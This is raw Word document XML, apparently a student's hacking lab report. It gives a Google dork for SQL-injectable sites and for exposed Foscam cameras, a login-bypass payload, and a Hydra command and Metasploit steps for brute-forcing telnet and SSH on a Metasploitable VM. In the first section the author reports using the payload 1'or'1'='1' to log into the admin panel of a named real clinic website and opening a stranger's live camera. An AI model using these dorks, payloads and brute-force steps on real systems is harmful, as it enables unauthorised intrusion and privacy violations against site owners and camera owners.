          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MapsTransportationBusiness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRDefault="00FC301B" w:rsidP="00943135">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RecordsPublic Records</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="00943135" w:rsidRDefault="00FC301B" w:rsidP="00943135">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Take some random websites using Google hacking database and enter into their admin panel using SQL Injections </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63093DE0" wp14:editId="7497ADE9">
            <wp:extent cx="5865495" cy="2493034"/>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3929" cy="2500869"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Used this google dork to find websites vulnerable to sql injections </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">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79F7C74A" wp14:editId="31A567A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FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Selected a website (</w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="004750F9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>https://www.bcinterioradhdclinic.com/adminLogin.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) and used manual sql injection (1'or'1'='1') </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">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31856E2C" wp14:editId="66E049E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C301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Was able to log in successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00785C5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Show some live cameras using Google hacking database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="621AB74A" wp14:editId="35F672F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785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC301B" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Used a google dork</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(intitle:"Device(Foscam)" "Real-time IP Camera Monitoring System") to find various ip cameras live and opened one to view it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00FC301B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00FC301B" w:rsidP="00785C5C">
      <w:pPr>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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AA63D55" wp14:editId="668BD58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B2E36" w:rsidRPr="004750F9" w:rsidRDefault="001B2E36" w:rsidP="001B2E36">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>System Hacking</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28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>1. Hydra</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00B65BD2" wp14:editId="6EED357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t xml:space="preserve">First we’ll  get 2 files from github or web which contains most recently used username and passwords along with default passwords and usernames </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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D282C10" wp14:editId="292F122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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>STEP 2</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28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we’ll get target ip using nmap </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B2E36" w:rsidRPr="004750F9" w:rsidRDefault="001B2E36" w:rsidP="001B2E36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">We’ll use matasploitable machine </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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DD7CEFD" wp14:editId="2B2C8692">
            <wp:extent cx="5503545" cy="352820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908" cy="3547669"/>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t>Type ifconfig</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t>My ip address was 192.168.86.128</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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66334D87" wp14:editId="5932209D">
            <wp:extent cx="5990528" cy="2809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4680" cy="2821204"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRDefault="00943135"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now well use telnet and hydra command </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t xml:space="preserve">hydra -L /root/user.txt -P /root/pass.txt telnet://192.168.86.128  </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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="731A0870" wp14:editId="48C2B5FC">
            <wp:extent cx="5267325" cy="296287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5866" cy="2973301"/>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t>Failed</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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Let me try again with different combinations </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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70CC63C7" wp14:editId="6C1CC453">
            <wp:extent cx="5980695" cy="3364141"/>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2980" cy="3376676"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B2E36" w:rsidRDefault="001B2E36" w:rsidP="00943135">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Passed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRPr="00943135" w:rsidRDefault="00943135" w:rsidP="00943135">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B2E36" w:rsidRPr="004750F9" w:rsidRDefault="001B2E36" w:rsidP="00785C5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> auxiliary Module</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Cs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Use msf consol to navigate to matasploitable framework</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A487E2" wp14:editId="10FDB9F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0"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>We’ll go for ssh login</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70D378BD" wp14:editId="7BCBE63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bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>We’ll use set USER_FILE /root/user.txt</w:t>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r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="584BBA0D" wp14:editId="6C2D581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p>
    <w:p w:rsidR="001B2E36" w:rsidRPr="004750F9" w:rsidRDefault="001B2E36" w:rsidP="001B2E36">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B2E36" w:rsidRPr="004750F9" w:rsidRDefault="001B2E36" w:rsidP="001B2E36">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Set  rhosts and run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="001B2E36" w:rsidP="00E62C19">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="229A571C" wp14:editId="160C895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sidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="005F51AA">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24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F51AA" w:rsidRPr="004750F9" w:rsidRDefault="005F51AA" w:rsidP="005F51AA">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24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting Server Vulnerabilities</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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
